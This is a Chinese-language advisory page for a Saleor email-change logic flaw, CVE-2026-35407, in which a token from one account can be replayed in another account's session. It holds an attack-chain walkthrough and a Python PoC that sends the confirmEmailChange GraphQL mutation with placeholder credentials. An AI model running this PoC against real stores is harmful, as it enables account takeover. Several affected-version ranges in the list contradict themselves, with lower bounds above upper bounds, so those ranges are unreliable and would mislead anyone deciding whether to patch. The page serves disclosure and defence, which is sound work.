CVE-2026-35407 CVSS 6.5 中危

CVE-2026-35407 Saleor 邮箱更改逻辑漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35407

漏洞类型

业务逻辑漏洞

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Saleor

漏洞概述

Saleor电商平台在2.10.0至多个修复版本之前存在一处业务逻辑与授权缺陷。在账户邮箱变更的确认流程中，系统未能严格验证确认令牌的归属用户。这导致攻击者可以利用一个账户生成的有效令牌，在以另一个账户身份认证时进行重放攻击。结果是将第二个账户的邮箱地址强制更新为令牌预设的邮箱，从而可能绕过原主人的控制接管账户。

技术细节

该漏洞的核心在于Saleor处理邮箱更改确认请求时的逻辑缺失。当用户请求更改邮箱时，系统生成包含新邮箱的令牌。在确认阶段，受影响的版本仅验证了令牌本身的合法性和有效性（如未过期），却未校验提交该令牌的当前认证用户是否为令牌的原始持有者。攻击者首先获取一个有效的邮箱更改令牌（可来自自己控制的账户），随后登录目标账户。利用目标账户的会话，攻击者发送包含该令牌的确认请求。由于缺乏归属校验，服务器错误地执行了操作，将目标账户的邮箱更新为令牌中的新邮箱地址，实现了对目标账户完整性的破坏。

攻击链分析

STEP 1

令牌获取

攻击者控制账户A并发起邮箱更改请求，获取系统生成的有效邮箱更改令牌。

STEP 2

身份认证

攻击者使用合法凭证登录目标账户B（受害者）。

STEP 3

令牌重放

攻击者在账户B的已认证会话下，向服务器提交包含账户A令牌的确认请求。

STEP 4

漏洞利用

服务端因未校验令牌归属，错误地执行操作，将账户B的邮箱更新为令牌中的新邮箱。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target GraphQL endpoint
url = "https://target-saleor-instance.com/graphql/"

# The email change token obtained from Account A (leaked or controlled)
leaked_token = "VALID_EMAIL_CHANGE_TOKEN_FROM_ACCOUNT_A"

# GraphQL Mutation to confirm email change
mutation = """
mutation confirmEmailChange($token: String!) {
    confirmEmailChange(token: $token) {
        user {
            email
        }
        errors {
            field
            message
        }
    }
}
"""

# Attacker is authenticated as Account B (Target Account)
# Replace with valid JWT or Session Cookie for Account B
headers = {
    "Authorization": "Bearer JWT_TOKEN_OF_ACCOUNT_B",
    "Content-Type": "application/json"
}

variables = {
    "token": leaked_token
}

# Sending the request to confirm email change for Account B using Account A's token
response = requests.post(url, json={"query": mutation, "variables": variables}, headers=headers)

# Output the result
if response.status_code == 200:
    print("[+] Attack Successful!")
    print(response.json())
else:
    print("[-] Attack Failed")
    print(response.text)

影响范围

Saleor >= 2.10.0, < 3.23.0a3

Saleor >= 3.23.0a0, < 3.22.47

Saleor >= 3.22.0, < 3.21.54

Saleor >= 3.21.0, < 3.20.118

防御指南

临时缓解措施

建议立即检查系统版本并应用官方补丁。如果无法立即升级，应临时禁用用户自助修改邮箱的功能，转由管理员后台人工审核处理，或通过WAF拦截异常的GraphQL请求模式，防止令牌重放攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表